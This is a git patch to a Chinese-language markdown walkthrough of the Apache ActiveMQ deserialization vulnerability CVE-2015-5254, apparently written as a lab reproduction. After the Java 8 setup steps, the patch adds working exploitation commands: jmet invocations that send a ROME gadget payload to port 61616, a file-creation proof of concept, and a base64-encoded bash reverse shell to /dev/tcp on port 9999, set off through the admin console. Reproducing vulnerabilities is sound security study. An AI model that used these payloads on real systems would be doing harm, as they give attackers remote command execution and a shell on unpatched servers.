From a0c04df852848f5cd26efb3aeb78ae9780805765 Mon Sep 17 00:00:00 2001
From: Threekiii <472361400@qq.com>
Date: Mon, 21 Feb 2022 13:46:17 +0800
Subject: [PATCH] =?UTF-8?q?Apache=20ActiveMQ=20=E5=8F=8D=E5=BA=8F=E5=88=97?=
 =?UTF-8?q?=E5=8C=96=E6=BC=8F=E6=B4=9E=20CVE-2015-5254.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 .../Apache ActiveMQ 反序列化漏洞 CVE-2015-5254.md | 88 +++++++++++++++----
 1 file changed, 72 insertions(+), 16 deletions(-)

diff --git a/Web服务器漏洞/Apache ActiveMQ 反序列化漏洞 CVE-2015-5254.md b/Web服务器漏洞/Apache ActiveMQ 反序列化漏洞 CVE-2015-5254.md
index 254d922..2e53d30 100644
--- a/Web服务器漏洞/Apache ActiveMQ 反序列化漏洞 CVE-2015-5254.md	
+++ b/Web服务器漏洞/Apache ActiveMQ 反序列化漏洞 CVE-2015-5254.md	
@@ -1,4 +1,4 @@
-# Apache ActiveMQ 反序列化漏洞 CVE-2015-5254
+# ActiveMQ Deserialization Vulnerability (CVE-2015-5254)
 
 ## 漏洞描述
 
@@ -10,9 +10,56 @@ Apache ActiveMQ是美国阿帕奇（Apache）软件基金会所研发的一套
 Apache ActiveMQ 5.13.0之前5.x版本
 ```
 
-## 漏洞复现
+## 环境配置
 
-首先下载 jmet [下载链接](https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar)
+### 安装jdk
+
+查看java版本，如果是java 11需要切换到java 8
+
+```
+java -version
+```
+
+安装java 8，默认安装路径/usr/lib/jvm/java-8-openjdk-amd64
+
+```
+sudo apt install openjdk-8-jdk
+```
+
+配置环境变量，添加jdk安装路径
+
+```
+sudo vim ~/.bashrc
+
+# 在最后一行添加
+export JAVA_HOME=/usr/lib/jvm/java-8-openjdk-amd64
+```
+
+### 切换jdk版本
+
+采用update-alternatives命令进行版本切换
+
+ /usr/bin/java和/usr/lib/jvm/java-8-openjdk-amd64/bin/java两个路径一定要和自己的路径吻合
+
+```
+sudo update-alternatives --install /usr/bin/java java /usr/lib/jvm/java-8-openjdk-amd64/bin/java 1070
+```
+
+切换jdk
+
+```
+sudo update-alternatives --config java
+```
+
+![image-20220221132209838](../../../Markdown/images/202202211324903-16454223573971.png)
+
+再次查看java版本，切换成功
+
+![image-20220221132246597](../../../Markdown/images/202202211324904-16454223573973.png)
+
+### 漏洞复现
+
+下载 jmet [下载链接](https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar)
 
 ```shell
 wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar
@@ -22,29 +69,38 @@ mkdir external
 对目标发送一个生成**/tmp/vuln**的 payload
 
 ```plain
-java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/vuln" -Yp ROME xxx.xxx.xxx.xxx 61616
+java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/awesome_poc" -Yp ROME 192.168.174.128 61616
 ```
 
-访问 http://xxx.xxx.xxx.xxx:8161/admin/browse.jsp?JMSDestination=event 可以看到多了一条消息队列
+![image-20220221133654012](../../../Markdown/images/202202211345369-16454223573975.png)
 
-![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/1.png)
+访问 http://192.168.174.128:8161/admin/browse.jsp?JMSDestination=event 可以看到多了一条消息队列，ID为kali-38087-1645421794512-1:1:1:1:1
 
-点击这个信息触发文件创建
+![image-20220221133733242](../../../Markdown/images/202202211345370-16454223573977.png)
 
-![2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/2.png)
+点击这个信息触发文件创建，成功执行命令 touch /tmp/awesome_poc
 
-成功执行命令创建文件，也可以创建一个反弹shell的payload
+![image-20220221133952983](../../../Markdown/images/202202211345371-16454223573979.png)
+
+![2](../../../Markdown/images/202202211324906-164542235739711.png)也可以创建一个反弹shell的payload
 
 ```shell
-bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/9999 0>&1  (base64编码)
-YmFzaCAtaSA+JiAvZGV2L3RjcC94eHgueHh4Lnh4eC54eHgvOTk5OSAwPiYx
+bash -i >& /dev/tcp/192.168.174.128/9999 0>&1  (base64编码)
+YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3NC4xMjgvOTk5OSAwPiYx
 
-bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94eHgueHh4Lnh4eC54eHgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}
+bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3NC4xMjgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}
 
-发送payload
-java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94eHgueHh4Lnh4eC54eHgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}" -Yp ROME 172.21.231.183 61616
+# 发送payload
+java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3NC4xMjgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.174.128 61616
 ```
 
-同样点击消息队列会触发命令执行
+![image-20220221134243490](../../../Markdown/images/202202211345372-164542235739713.png)
+
+查看消息队列，ID为kali-38435-1645422155171-1:1:1:1:1
+
+![image-20220221134313545](../../../Markdown/images/202202211345373-164542235739715.png)
+
+监听9999端口，点击消息队列会触发命令执行，反弹Shell
+
+![image-20220221134508900](../../../Markdown/images/202202211345374-164542235739717.png)
 
-![3](https://typora-1308934770.cos.ap-beijing.myqcloud.com/3.png)
\ No newline at end of file